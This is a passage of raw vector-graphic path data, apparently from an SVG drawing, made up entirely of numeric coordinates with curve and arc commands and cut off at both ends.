3.3,9.2.5,10.2,2.1-3,1.4,1-.2-1.8-.7-3.1-.4,2.1.1,1.5.3,1.8.5,7.2.4,11.5.7,7.9,1.1-1.6-.1-6.9-.6-8.6-.3,7,.2-1.4.4-.8.6a53.87,53.87,0,0,1,8.8.5c2.1,0,5.4-.4,6.8-.2.1.3-2.3.3.5.6-1.9,0-3.8-.1-5.7-.1,8.3,1.1,3.6,1.5,2.1,2.3,5.1.2.2.4,3.3.6a13.76,13.76,0,0,1,4.1-.1c1.5.5-6.6.4-2,.9-3.2-.1-5.3-.1-5.5.1,5.4.1,1.4.5,7.3.4-2.8.2.7.4,2,.7,4.9-1.5-2.8-3.3,4.1-4.8a36.81,36.81,0,0,1-4.2-.1c-.9-.5,4.3-.6,1.8-1.2-6.7-.2,1.3.4-2.5.3-5.1-.5-2.2-.8-2.6-1.4a43.87,43.87,0,0,0,5.5-.1c-.8.4-6.2.4-.6.8-.5-.3,3.8-.6.7-.9,1.2-.1,1.3-.3-.4-.5.1.3-4.7-.1-4.4-.2,2.8-.3-3.1-.7,2.1-.7.5.4-.6.8,4.9.9-.1-.7-1.3-1,1.7-1.3-3.1,0-4.6-.2-4.5-.4,7.5-.2-1.9-1.3-4.2-1.6,3.7-.1,5.6-.3,7.9-.5a36.81,36.81,0,0,1-4.2-.1c0-.3,3.3-.4,5.1-.5-7.7-.2-3-.4-6.4-1,2,.1,2.5.2,4.4.3.6-.4-2.7-1.1.3-1.2a33.79,33.79,0,0,1,4.5.3c1.4-.1.1-.4,4-.2-1.5-.2-1-.6-3.4-.7-3,.1-2.7.6-7.9.5,1.7-.4,2.9-.1-1.8-.5,4.1,0,4.6-.5,8.4.1-.2-.3-1.4-.7,2.3-.6,1.3.3,3.4.5,3.5.8a43.14,43.14,0,0,1,8.8.5c1.9-.3-1.5-.6-4.9-.9a13.45,13.45,0,0,1-4.2,0c1.9-.2-1.8-.4,2.4-.5-2.1-.1-5.2-.1-5.8-.2.6-.1,1.3-.2,2.5-.3,8.9.5,11.6,1.1,12.7,1.8,2.1.1,7.2,0,7.2.3-1.9,0-1.1.2-2.6.2-4.9,0-7.5-.4-8.4-.1,15.2.5,10.2,1.8,7.5,2.2-.1.3,3.8-.2,4.4.2-.7.4-3.7.9-1.7,1.3-1.6,0-4.1-.1-4.1,0,10.7.6-1.5,1.9,3.5,2.4-.2-.1.4-.3,1.3-.1.5.4-7,0-6.6.4,3.4.2,5.8-.3,7,0-4.7.1.2.1,1.8.5-3,.1-2.2.6-5.2.4,10.3,1-1.4,1.7.7,2.4-5.3-.1-5.1.3-6.4.6,5.3.2,2.2-.5,6.6-.4-1.7,1,5.6,2.5,10.1,3.6-3.8,0-3.1-.3-5.9-.4-.7.4,5.6.4,6.2.7-5.7.4-13.7.9-4.1,1.7.1-.2-.9-.4,1-.4.2.3,7.9,1.3,1.4,1.6-2-.2-5.4-.2-6-.5,1.8,0,2.4-.2,2.4-.4-4.4,0-4-.4-7.4-.5-1.7.4,4.1.3,3.3.6-3.9-.1-3-.2-5.7-.1,3.3.2,4.4,1,7.7.8-6,.2,3.5,1.2-2.9,1.5-3.6-.2,3.3-.5-3.3-.6-.8.2-.5.6.8.9,6.3.2-1.3-.2,2.6-.2,6.2.1,5.4,1.2,9.2,1-6-.8-.1-1.5-5.7-1.8,3.7-.2,4.2-.6,9.1-.7.1.4.8.3,2.3,1-4.2,0-13.5.6-2,.8-1.5-.4.9-.5,3.8-.5-3.1.3,4.8.6.8.9,6.3.1.8-.9-1-1.1,1.8,0,2.1.2,4.4.2-3.6-1.5.8-2.2,5.5-3.3-7.3-.2-4,.6-10.6.5-.1-.1-1.3-.2-1.6-.3,4.5.1,4.5-.3,3.6-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.5-.6.8-1.1-3.9-1.3,2.9.1-3.7-.8.7-.7.9.1,4.7.5,5.8.2-4.4-.3-4.7-.8-5.3-1.3a53.22,53.22,0,0,0,6.8-.2c-2.5-.4-6.4.1-8.6-.3,5.5-.1.3-1,7.4-1.1-3.6,0-5.2-.2-4.6-.4,1.7.1,9.6.4,5.7.1-5.1,0-4.2-.9-.7-.8-.2.9,8.5.6,10.9,1.3a24.32,24.32,0,0,1-2.7,0c-2.8-.1-2.1-.3-5.9-.3-.3.5-3.8.4.8.9a45.4,45.4,0,0,1-6.9.1c-.2.4,7,.4,7.6.7.3.3-2.2.3-.8.6-1.4,0-2.8-.1-4.2-.1,3.2.6-.3.2,4.9.9-1.5.4-5.5.4-9.4.3,1.2.2,7.9.1,8.7.4.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c4.6.2,4.2-.1,7.1.2-4.9-1.3,3.4-2.1-2.9-3.2,1.6-.1,3.7-.1,7,0-1.5-.6-2.7-1.1-4.5-.4-.9-.2-2.3-.3-3.2-.5,6.2.1,6.6-.4,2.3-.5,5,.1-3.3-.4,1.1-.3,4.4-.1,3.8.6,6.5,1,3.9-.3-1.6-1.2-2.9-1.7,6.4.6-.6-.8,3.5-.8,2.4.1,3.5.8,6,.5-4.7-.5-2.6-1-9.7-1.5,9.2-.4-10.1-2.1,1.8-2.7-4.4-.3-2.6-.8-.9-1,3.2.1-.2.6,6.1.6-.8-.4-3-.7-6.3-.9.2-.2,3.6-.1,3.9-.3-2.6-.1-5.4-.7-3.3-.6,1.7.1,1.7.2,1.7.4a29.51,29.51,0,0,0,5.4-.2c-2.1-.1-5.2-.1-5.8-.2a76.33,76.33,0,0,0,12.9-1.1c-7.2-.2,2.2-.6-6.2-.7,0,.4,4.5,1.1-.9.5-3.2.2,2.6.7-.6.9-.9,0-1.9,0-2.9-.1-1.2-.6,6.9-.8,1.5-1.5-.1.1.5.3-1.1.3-.1-.1-1.3-.2-1.6-.3.4-.2,5.4,0,3.9-.3-7.6.2-.1-1.1-10.9-1.3,5.1-.1-1.1-.2-.6-.7a24.32,24.32,0,0,1,2.7,0c2.6.1,5.3.7,7.3.4-3.5-.1,0-.7-4.8-.8,1.2.2-2.4.4-2.6.2-1.8-.5,8.2-.3,2.1-.8a8.77,8.77,0,0,1-2.8,0c4.1-.4.9-.9,1.6-1.4,2.1.3,2.2.8,6.5,1-1.4-.5.1-.7,3.5-.8-5.1-.2-7,.1-8.6-.3,4.2.1,1.1-.6,5.1-.5-4.8.1-7.6-.5-8.6-.3,5.3.4-3.5,0-2.6.2,2.3,0,2.8.7.5.6.4-.3-3.5-.9-4.7-.7,3.5.1.6.4-1.1.3-3.3-.3.4-.3-.6-.7-2.7-.2-4.5.2-5.7-.1.6-.6,4.6-1,1.1-1.9,3.8.5,5.1-.5,8.3,0-2,.2-3.5.8,2.4,1.1-2-.6-3.2-1.6,1.2-1.8,2.1.7,1,.8-1.7,1.3,7.7.1,9.3.4,17.3.7.8-.3-4.6-.9-4.9-.8-1.6.2,5.9.5,1.8.5a36,36,0,0,1-7.6-.7c4.5-.1.6-.4,2.1-.8,5.7.3,2.7-.2,5.4-.2,2.8.3.4.3.5.6,8.8.1-.3-.4-.7-.8,2.5,0,4.4.1,5.8.2a9.4,9.4,0,0,0-3.2-.5c-1.5.5-12.5-.4-10.5-.9a54.5,54.5,0,0,1,7,0c.1-.2-1.8-.3-1.8-.5,5.1.1,3.5-.4,8.1-.3-2-.5-.4-.5-4.8-.8-4.1,0-.1.4-2.5.4-2.2-.1-5.6-.7-2-.7,4.6.1,7.7.5,8.3,0-7.3.1-1.1-.2-4.5-.4a87.83,87.83,0,0,1-9.6.1c-1.1-.7,1.9-.8,1.7-1.2,1.8.3,1.6.8,5,1,4.9-.4-3.4-1.4,2.8-1.6-3.5.4,3.8.5,6.3.9,1.7-.2,4.5.3,5.6,0a41.63,41.63,0,0,1-6-.5c4.4,0,6-.5,9.5-.2-2.3-.6-8.7-1.4-.2-1.8,1.5.2-3.9.3.4.4a3.3,3.3,0,0,1,1.4,0c.8.3-6.5-.2-4,.2,7.2.3,6.1,1.1,9.8,1.6-3.9-.2-2.6.2-4,.2,3.4-.1,3.9.6,5.8.2-5.3-.3,2.2-.3.9-.5-6.7-.3,1.5-.7-3.9-1.3,2.1.1,5.2.1,5.8.2-.4.1-3.1.3.4.4.2-.3,1.9-.4.7-.7-2.5,0-3.4-.2-3.1-.4a42.45,42.45,0,0,1-7.3-.4c4.4,0,6,.4,7,0-6.1-.3-10.4-.7-14.8-1.1a37.36,37.36,0,0,0,5.5-.1,4,4,0,0,0,1.6.3c-1.9-.6,4.9.3,5.5-.1-9.7-.4-2.6-.4-9.2-1,4.7.2,3,.2,5.6,0,.7.6.3.1,4.3.2.1.1,1.3.2,1.6.3-4.1-.3-3.5.4-1,.4a83,83,0,0,1,8.5.2,36.57,36.57,0,0,0-8-1.2c.8-.5,1.5-.9,7.8-.6.5.3-2.9.2-3.9.3,3.9.5,5.4,1,8.2,1.4-2.5-.4,5.9-.2,5.6,0-1.6.3-5.8.7-.7.7-7.8,0-4,.8-10.4.7-.3.4,3.9.5,6.2.7-3.6-.1-1.9.4-3.8.5a38.81,38.81,0,0,0-6.9.1c4.4.1-2,.7,1.8.5.6-.1,1.3-.2,2.5-.3-.4.3,2.4.5,3.4.7,4.8.2,1.8-.4,8.2-.1-.6.2-.3.4-2.4.5-1.1-.3-2.5.2-5.5.1,2.2.5.4.5,1,1.1,7.5.2.4-.5,2-.9,10.8.2,9-.7,17.4-.7-1.7-.4-6.7-.5-2-.7-2.3-.1-4.7-.1-7.1-.2-.4.3,4.6.3,3.4.7a17.57,17.57,0,0,1-3.9.4,30,30,0,0,1-3.6-1c4.5.1,1.7-.4,4.3-.4-8.9,0-4.1.8-12.1,1,1.8-.5,2.6-1.3,12.5-1.6-.5-.2-2.3,0-2.9-.2,1.4,0,1.6-.2-.2-.2.9.2-3.3.5-4,.2,1.8-.2,1.7-.7,4.9-.8,2.9.1,1.7.4,4.6.5.6-.1,1.8-.2,2.5-.4-2.8-.1-9.4-.5-4.8-.7,2.7.7,2.1-1,9.3-.4-.8-.3-4.8-.4-3.5-.8,6.2.4,2.4-.1,5.4-.2,3.2,1.3,6.6,3.1-2.7,3.2,1.8.7,1,1,2.7,1.5,1.9,0,3.2.1,4.3.2-.5-.4,6-.1,6.6-.4-4.1,0-6.9,0-8.5-.2.9-.3-4.8-.7-.7-.8,1.7.2,1.9.4,2,.7,5.3,0,11.5-.5,7.4-1,.1.3.2.6-3.8.5.7-1.4-7.4-3.4,9.8-3.1-5.5-.3,7.8-.3.7-.7-1.4.1-.1.4-4,.2-1.1-.5-.4.1-4.3-.1a5,5,0,0,1-.6-.7c-6.1-.2-4.2.4-9.4.3,3.8-.7,20.4-1.5,5.1-2.1,0-.1-.1-.1-.2-.2,3.4-.1,6.2.5,7.1.2-2.2-.1-4.6-.3-4.6-.5,6.3.2-1.7-.6,2.1-.7,6.8.6,6.8,1.5,6.1,2.2,1.6.1,2.3.2,3,.3,5.8.3,7-.3,9.8.1-2.6.2-2.7,0,.3.3-3.9,0-5.2.3-4.9.8,7.7.2-.3-.4,3.8-.5,8,1.3-1.1,1.5,2.4,2.7,6.5.3,3.7.7,10.4.8-5.3,0-8.5.3-11.3-.3-1,.3,4.5.9,6.2.7-1.2-.2,3.8.3,3.9-.2a21,21,0,0,1,4.8.8c-2.5.1-2.6-.1-7.1-.2-.4.4-.5.3.7.8,1.9.3,5.1-.1,7.2.3a40.53,40.53,0,0,0-6.4.6c9.2.7,4.1,1.5,4.8,2.3-3.3-.1-9.6,0-5.3.2,1.8-.1,4.6-.2,8.2-.1-2.1.3-4.3.4-.6.9-7.5-.2.5.6-5,.7,2.1.1,7.2,0,7.2.3l.2.2c-5.1-.1-7-.4-11.5-.5-1.7.4,6.4.2,4.6.5,4.1.2,3.5-.1,7,0-1,.5,4.6,1.1-1.5,1.5,5.6.2,3,.5,4.8.8-.9.2-7-.2-5.4.2,2.7,0,3.2.2,5.8.2.1-.1.2-.3,2.7-.2,10.2.6,3.7,1.5,3.2,2-.1.1,7.4,1.2-2.3.6,1.7.3,2.9.8-3.7.6.6-.2,3.2-.2,2.3-.6-4.2-.1-5.1-.4-8.8-.5,1.5.5-4-.3-2.5.3.8.4,7-.1,8.6.3a17.63,17.63,0,0,1-3.9.4c-1.46-.17-2.93-.27-4.4-.3-.6.2-3.2.7-.6.9,2.4,0-.6-.5,2.3-.5,2.7,0,11.7.5,2.9.2-.1.4,8.2.3,6.3.8-2.4,0-3.8-.2-4.3-.1.2.4,3.7,0,6,.5a51.1,51.1,0,0,1-5.4.2c4.4.5-2.2,1.3,6.4.9a3.92,3.92,0,0,1-2.3.5c-1.5-.4-2.2-.2-5.8-.2,1.4.6-.8.9-1.6,1.4,3.3.2,5.1-.2,5.7.1-3.6-.1,2.1.2.4.4-2.1,0-5.3-.2-5.6,0,.5.5,3.4,1.1-1.9,1-.9-.2,1.2-.5-1.9-.6-3.9.3,4.3.8,1,1.1,1.9,0,3.8.1,5.7.1,0,.4,5.7,1-3.5.8,2.7-.4-5.2-1-10.5-.9.1.3,1.4.7-.6.9,2.1.3,4.1-.1,5.8.2-2.1.3,6.3,1.5,3.1,1.9,2.8,0,.7-.5,5.2-.4,5.3.9-3.4,1.6-.9,2.2a37.63,37.63,0,0,1,3.8-.5c2.3.6-2,.9-1.3,1.7.1.1,2.6.2,3,.3-.1.5-7,.9-11.7.9,9.5.3,8.4-.3,12.1-.5,3.8.6-3.6.6,1.1,1.2,2.2,0-.8-.6,3.9-.3-3-1-7.2-2,.6-2.5-2.3.7,1.1.3,4.8.8-.2.3-5.2.7-3.4.9a11.09,11.09,0,0,1,2.7,0c3.5.4-2.9.9.8.9-.2-.2.8-.3,2.5-.3,3.9,1.1-2.2,1.4,4.7,2.2-9.4-.1,2.3,1.7-6.9,1.6-1-1.1.2-1.6-2.1-2.4-3.4.1-2.8-.4-4.7-.7-6.5.4,2.1,1.5,4.6,2.1-1.8,0-1.8.1-4.1,0,.6-.4-2.9-.5-2.2-.9-2.4,0-7.6-.2-6.8.2,2.7.1,3-.1,5.6,0a7.57,7.57,0,0,0,.8.9c-9.5,0-9.1-.2-18.5-.5,0-.1,1.7-.1,1.1-.3-10.1-.2-11.8-.9-16.5-1.4-3.8.3,5.7.5,3.7,1.1a21.29,21.29,0,0,0-4.3-.1c4.4,0,1,.6,6.1.6-.4-.3.3-.4,2.3-.5.2.1,2.6.2,3,.3,1.5.4-1.9.3-2.4.5,1.1.1,2.8.1,2.9.2,5.7.2-1.9-.4,5.4-.2,9.1.7,19.7.5,16.6,1.5-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.8,1-2.8,1.5-3,2.9,3.4.2,5.1-.2,5.7.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7-.4.3-4.2.2-6.7.3,2,.2,5.3.2,7.3.4.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a44.62,44.62,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2A60.14,60.14,0,0,1,434,68.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.52,31.52,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0h0c3.1,1.1,11.5,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4h-1.3c-4.1-.1-5.1-.3-4.9-.7a17.46,17.46,0,0,0,5-.3c1.4-.4,1.6-.8,8.3-.4-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-5.5-.6-3.8-2-7.2-3a23.68,23.68,0,0,0-2.9-.6h3a16,16,0,0,0,2.5-.1,15,15,0,0,1-2.4-.2c-1.6-.2-2.7-.3-5.1-.4,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.91,97.91,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.8-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.15,66.15,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7q1.65.3,4.2.6c1,.1,2.1.2,3.5.3,5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1a24.24,24.24,0,0,1-3.2.3c-2.1.1-3.8.2-1.6.6-.9-.2.2-.2,1.5-.1,1.1.1,2.4.2,2.8.2a5.67,5.67,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.52,31.52,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a27.09,27.09,0,0,1-3.1-.3,17.94,17.94,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.09,41.09,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.06,9.06,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.82,31.82,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a4,4,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.81.2,1.91.3.41.4,11.19.3.19-1.1,0-1.6s10.4,0,9.09-.7a35.68,35.68,0,0,0-4,.1c-2.19-.5-5.59-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.19-.3-6.19-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.59,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-3.7-1.5,5.5-1.6-7.2-1.3-3.3-3.2,2.1-3.9a14.11,14.11,0,0,0,2.9.2c-.4-.3-1.3-.5-3.4-.7-.1.1-.2.3-2.6.2-.7-.8,1.2-.9.1-1.4,2.1.1,3.7.2,5.9.4-2.5-.7,4.1-.6,1.6-1.3-3.9,0-3.7.3-7.1-.2a27.6,27.6,0,0,0,5.3-.3c-2.3-.3-5.8.1-7.3-.4.4-.7-1.2-.7-2.7-1.5,5.6.2,4.7-.5,9.6-.1.3-.7,3.6-.7-2.5-1.3,4.4.3,5.4-.1,10,.3.1-.2-1.8-.3-1.8-.5-3.1,0-7.5.1-8.6-.3,2-1.1,6.3-2.5-1.7-3.5,2.5,0,4.4.1,5.8.2-.2-.2-.3-.4-.5-.6-3.6,0-5.2-.2-4.6-.4,6.1.4,2.5-.2,8.31,0,4.09.6-1.5.9-2.91,1.5,7.9.4,6.31,1.6,2.5,1.9,7.9-.3,6.81-1.8,4-2.4,3.2-.6,7.5-1.1,8.1-1.9a20,20,0,0,1-4.5-.4c-4.4-.2-4,.1-8.4-.1-1.7.4,4.1.3,3.3.6-6.9-.3-3.09.4-9.59.1.8-.5,6.4-1.1-1.31-1.4-.19-.2-.3-.4-.5-.6,1.9.2,5.31.2,7.31.4.19-.6-7.5-.1-7.6-.7,2.3-.2,5.69-.1,1-.4,4.5-.2,7.8.4,9.9.2-2.4-.1-3-.8-.7-.8a28.18,28.18,0,0,1,5.8.3c-7.3-.3,1.2.7.9,1-2,.1-5.7,0-6.8.2,6.9.2,1.1.6.7.8,9.1.1,6.7-.6,7.6-.8,4.4.1,1.3.4,6.19.7-1.59-.5-5.9-1,.41-1.1-3.7-.1.69-.7-6.2-.7-1.7.3,4.4.7.6.7-6.7-.6.3-.7,1.8-1-4.7-.2-.8.3-5.5.1-.1-.1-1.3-.2-1.6-.3-.9-.6,2.2-.6,6.1-1-1.1-.3-2.1.1-4.2,0-.1-.2-.9-.3-1.7-.4a29.51,29.51,0,0,1,5.4-.2c3.7.1,1.5.5,6,.5-1.5-.5-2-.6.6-.9-1.5-.3-6.2-.3-6.1-.7.2-.2,3.6-.1,3.8-.3-2.2-.2-4.4-.9-1.2-1.3-2.9-.2-4-.5-6.2-.7-1,.5,2.5.8-2,.9-.8-.1-1.7-.3-3.1-.4,0,.3,2.5.4,3.3.6-8.8-.3-.5.7-3.6.7-1.9-.1-2.8-.2-5.8-.2,4.2.7,6.8,1.7-1.1,1.9,8.3.1,2.8,1.2-3.7.6.5.6,4.2.3,6.2.7-2.6,0-3.3.2-6.9.1-8.2-1.2-2.7-1.7,3.4-2.4-4.5-.8-1.7-1-4.1-1.5,1.4,0,2.8.1,4.3.1-3.9-.2-2.3-1.3-6.5-1,3.7.3,1.7,1-1.9.9-1.6-.7,1.5-1-.1-1.7a29,29,0,0,0,6.9-.1c-8.3-.2-6.2-.8-1.9-.6-1.9-1,3.8-1.9-1.4-3.2,5.4-.1,5.3-.7,1.7-1.2a41.25,41.25,0,0,1,4.3.2c-1.9-.5,1.1-.5,3.7-.6-4.2-.5-4.8.3-7,0a13.65,13.65,0,0,1,5-.7c-.1-.8-5.1-2.5.1-3.1-5-.8-7.6-4.5,1.6-2.9.7-.7-2-1.7-2-2.2,1,.6.7-.2,5.7.1-1.5-.4-2.1-.4.9-.5-6.7-.2,1.7-.7-3.7-1.1.1.1-1,.1-1.4,0h8.3c3.9.4,1.1.4,3.5.8,4.8-.1,4.7.2,8.7.4-3.4-1.5-1.3-1.2.7-2.4-5.2-.2-1.3.5-5.2.4-.2-.2-.3-.4-.5-.6-2.6,0-4.7,0-5.5.1,5.2.1-.6.3,4.6.5-1.1.1-.7.4-5.4.2-.5-.2.9-.5-3.2-.5,1.3.3,2.5.6-.8.6-5.4-.7.6-2-5.4-3,4.6-.2,5.6-2.2-2-2.3,3.1-.2,2.2-.1,6.8-.2,1.8.4-2.1,1.1,3.9,1.3-1.4-.5-3.7-1.3,3.6-.7,0-.3-4.5-.4-4.7-.7,1.9,0,3.8.1,5.7.1.1.2.2,1.1,3.4.7-4.1-.3-.4-.7.6-.9-3-.3-4.9-1.5,2.9-1.5,1.6.1,2.3.2,3,.3-.1.4-3.7.8.9,1a58,58,0,0,1-7.1-.2c-.1.5,4.3.2,6,.5-2.8.1-5.6.2-.9.5,4.3-.2,7.2-2,1.7-2.8,5.5-.3-5.2-1.9,9.6-1.7-1.6-.3-1.3-.9,3.4-.9.7-.3-4.1-.3-3.3-.6,2.6-.6,8.2-.3,16.3-.4-7.9-.2-7.2-1-3.9-1.3a21.78,21.78,0,0,1,3,.3c4.5-.3-7.8-.8-.8-.9,4.4-.1,2.5.7,4.4.3-3.6-.5,4.1-.4-2.1-.8.7-.2,4.1-.1,5.4-.2-5.9-.4-6.3-2.4,3.9-1.9-6.5-2.2,6.1-4.8,5.3-6.6,2.7.1,6.1.2,6,.5-1.9,0-6.3,0-1,.4-.4-.2,1.2-.2,4-.1,2,.4-3.7.6.8.9.3-.3,1.7-1,1.7-1.3-1.5-.1-6.